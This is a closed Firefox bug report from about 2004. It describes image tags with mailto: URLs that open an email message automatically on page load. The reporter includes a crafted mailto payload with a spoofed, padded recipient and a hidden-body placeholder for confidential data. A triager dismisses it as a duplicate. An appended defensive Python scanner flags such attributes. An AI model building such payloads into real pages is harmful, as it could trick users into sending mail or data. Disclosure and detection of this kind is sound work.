Closed Bug 273986 Opened 15 years ago Closed 15 years ago

when an image link starts with mailto:// a new email message opens automatically

Categories: Firefox :: General, defect, major (x86, Windows XP)

Status: RESOLVED DUPLICATE of bug 181860

People: Reporter: travis.hardiman+bugzilla, Assigned: bugs

Attachments: 1 file
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0

<img src="mailto://spacer.gif" /> will open a new message when loaded in HTML

Reproducible: Always
Steps to Reproduce:
1. Create a page with <img src="mailto://spacer.gif" />
2. Open in Firefox

Actual Results:  
a new email message popped up

Expected Results:  
broken image icon

I'll submit a simplified test case. - TH
When Firefox loads the page, a new email message pops up.
The reason I marked it security sensitive is because an image like this could be
generated with JavaScript:
<img
src="mailto:%22jerk@jerkstore.com______________________________________________________________________________________________________________%22%3Cbiggerjerk@jerksplus.com%3E?subject=Enter%20Contest!&body=Just%20hit%20send%20to%20enter%20contest!%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%5BINSERT_CONFIDENTIAL_STUFF_HERE%5D"
alt="jerk@jerkstore.com" />

I have tested this with both Outlook Express and Thunderbird so I don't think
the email client is to blame.
Bug 181860 and bug 167475 cover the fact that <img src="mailto:..."> can cause a
mailto: URL to open *without user interaction*.

Bug 53703 covers mailto: spoofing issues.  Your exploit doesn't make sense
because if the attacker's JavaScript has access to the user's confidential
information, he has better ways to get the information back to the attacker than to
convince the user to send an e-mail message.

*** This bug has been marked as a duplicate of 181860 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 15 years ago
Resolution: --- → DUPLICATE
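
A defender-side check for the behaviour discussed in this bug, as an added example (not code from the bug report or from Mozilla): it scans markup, for instance user-submitted HTML, for attributes that load on render and flags any whose URL scheme is not one a browser fetches as a subresource. The `FETCHABLE` and `AUTOLOAD` sets, the function names and the sample markup are assumptions constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: schemes a browser can fetch as a subresource ("" = relative URL).
FETCHABLE = {"", "http", "https", "data"}
# Assumption: (tag, attribute) pairs loaded on render with no click; not exhaustive.
AUTOLOAD = {("img", "src"), ("iframe", "src"), ("frame", "src"), ("script", "src"),
            ("embed", "src"), ("object", "data"), ("body", "background")}
# Constructed sample markup; addresses use the reserved .invalid TLD.
SAMPLE = """<p>Enter the contest!</p>
<img src="spacer.gif" alt="">
<img src="mailto://spacer.gif" />
<IMG SRC=" MAILTO:someone@example.invalid?subject=Hi" alt="x">
<a href="mailto:someone@example.invalid">write to us</a>
<iframe src="https://example.invalid/frame"></iframe>
"""

def url_scheme(value):
    """Return the lower-cased scheme of an attribute value ('' if relative)."""
    # Browsers drop surrounding whitespace and embedded tab/CR/LF before parsing.
    cleaned = "".join(ch for ch in value.strip() if ch not in "\t\r\n")
    try:
        return urlsplit(cleaned).scheme.lower()
    except ValueError:  # malformed authority, e.g. an unclosed IPv6 literal
        return "invalid"

class AutoloadAudit(HTMLParser):
    """Collect auto-loading attributes whose URL goes to an external handler."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases names and decodes character references in values.
        for name, value in attrs:
            if (tag, name) in AUTOLOAD and value:
                scheme = url_scheme(value)
                if scheme not in FETCHABLE:
                    self.findings.append((self.getpos()[0], tag, name, scheme))

def audit(html):
    """Return [(line, tag, attribute, scheme)] for every flagged attribute."""
    parser = AutoloadAudit()
    parser.feed(html)
    parser.close()
    return parser.findings

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

The ordinary `<a href="mailto:...">` link in the sample is not flagged, because it only opens the mail client after a click.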
--> Websites :: www.mozilla.com so timeless can close out Firefox :: Product Site.
Component: Product Site → www.mozilla.com
Product: Firefox → Websites
-> Firefox::General (939393)
Component: www.mozilla.com → General
Product: Websites → Firefox